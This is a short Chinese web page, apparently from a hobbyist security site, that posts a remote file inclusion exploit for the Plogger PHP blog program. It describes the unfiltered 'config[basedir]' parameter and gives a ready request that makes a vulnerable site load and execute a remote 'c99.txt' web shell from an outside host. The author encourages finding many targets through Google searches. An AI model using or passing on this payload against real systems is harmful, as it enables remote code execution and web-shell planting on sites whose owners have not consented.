• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    国外某PHP的网络日记程序0day

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    很老的漏洞了,但是现在还可以用!谷歌批量出来N多、

    Plogger是一款基于PHP的网络日记程序。

    程序未过滤用户提交的URI数据,可以利用漏洞以WEB权限执行任意命令。涛涛电脑知识

    漏洞在'plog-admin-functions.php'脚本对用户提交的'config[basedir]'参数没有过滤,

    指定远程服务器上的任意PHP文件作为包含对象,可以以WEB权限执行任意PHP代码

    EXP:

    /Plogger/PATH/admin/plog-admin-functions.php?config[basedir]=http://www.2cto.com /c99.txt?

  • 上一篇:网络安全
  • 下一篇:MetInfo 全局变量覆盖另类突破防注入
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1